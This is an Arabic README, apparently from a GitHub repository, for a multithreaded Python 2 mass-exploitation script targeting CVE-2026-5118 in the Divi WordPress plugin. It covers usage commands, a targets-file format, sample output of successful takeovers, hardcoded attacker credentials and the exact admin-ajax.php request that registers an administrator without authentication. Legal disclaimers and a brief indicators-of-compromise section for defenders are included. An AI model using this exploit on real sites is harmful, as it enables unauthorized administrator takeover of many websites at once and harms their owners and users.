
CVE-2026-5118 – استغلال جماعي بلغة Python2 لملحق ووردبريس Divi، تسجيل مدير غير موثّق عبر admin-ajax.php. ماسح متعدد الخيوط مع استخراج nonce.
⚠️ تحذير: هذه الأداة مخصصة لاختبار الاختراق المصرح به والبحث الأمني فقط.
الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. استخدم فقط على الأنظمة التي تمتلكها أو لديك إذن كتابي صريح لاختبارها. المزيد من إخلاء المسؤولية يمكنك رؤية إخلاء المسؤولية على غلاف Jenderal92. يمكنك التحقق منه هنا !!!
يستغل هذا السكريبت بلغة بايثون 2 ثغرة تصعيد امتيازات في إضافة ديفي ووردبريس (ونماذج ديفي المرتبطة بها). يسمح بتسجيل حساب مدير عن بعد عن طريق:
fb_nonce من نموذج تسجيل ديفي للهدف./wp-admin/admin-ajax.php مع role=administrator.https:// إذا كان مفقودًا.de_fb_obj).success, user_id, user created, إلخ).results.txt بالتنسيق:https://target.com/wp-admin/ | username | passwordurllib2, Queue, threading – غير متوافق مع بايثون 3 بدون تعديلات)git clone https://github.com/Jenderal92/CVE-2026-5118.git
cd CVE-2026-5118
chmod +x CVE-2026-5118.py
أنشئ ملفًا نصيًا يحتوي على نطاق أو URL واحد لكل سطر. يمكنك حذف http:// / https:// – سيضيف السكريبت https:// افتراضيًا.
مثال targets.txt:
example.com
https://vulnerable-site.com
http://127.0.0.1/wordpress
test-site.org
python CVE-2026-5118.py targets.txt
[*] Total targets : 4
[*] Credentials : Attacker / Attacker@123#+
[*] Threads : 20
[*] Output file : results.txt
[1] Checking https://example.com
[+] SUCCESS! https://example.com/wp-admin/
[2] Checking https://vulnerable-site.com
[+] SUCCESS! https://vulnerable-site.com/wp-admin/
[3] Checking http://192.168.1.100/wordpress
[3] FAILED http://192.168.1.100/wordpress
[4] Checking https://test-site.org
[4] FAILED https://test-site.org
=== DONE ===
Successful: 2 / 4
results.txt)https://example.com/wp-admin/|Attacker|Attacker@123#+
https://vulnerable-site.com/wp-admin/|Attacker|Attacker@123#+
يمكنك تخصيص المتغيرات التالية في أعلى السكريبت:
https:// إذا لم يتم توفير مخطط.fb_nonce باستخدام أنماط regex.multipart/form-data يحتوي على:
action=de_fb_ajax_submit_ajax_handlerfb_nonce=<nonce المستخرج>role=administratorde_fb_user_login / user_loginde_fb_user_pass / user_passde_fb_user_email / user_emailلمسؤولي ووردبريس الذين يستخدمون ديفي:
admin-ajax.php.role يمكن التلاعب بها.مؤشرات الاختراق (IOCs):
admin-ajax.php مع action=de_fb_ajax_submit_ajax_handlerAttacker)role=administrator في سجلات الوصولهذا البرنامج مقدم لأغراض تعليمية واختبار أمني مصرح به فقط. لا يتحمل المؤلف أي مسؤولية عن إساءة الاستخدام أو الضرر الناجم عن هذه الأداة. باستخدام هذا البرنامج، فإنك توافق على:
انتهاك هذه الشروط قد يؤدي إلى ملاحقة جنائية أو غرامات أو سجن.
طلبات السحب مرحب بها للتحسينات (نقل إلى بايثون 3، استخراج nonce أفضل، اكتشاف مسار تسجيل إضافي). يرجى الحفاظ على إخلاء المسؤولية الأخلاقي.
| Variable | Default | Description |
|---|
DEFAULT_USERNAME | Attacker | اسم المستخدم للتسجيل |
DEFAULT_PASSWORD | Attacker@123#+ | كلمة المرور (قوية مع أحرف خاصة) |
DEFAULT_EMAIL | [email protected] | عنوان البريد الإلكتروني |
THREAD_COUNT | 20 | عدد الخيوط المتزامنة |
OUTPUT_FILE | results.txt | الملف لحفظ الأهداف الناجحة |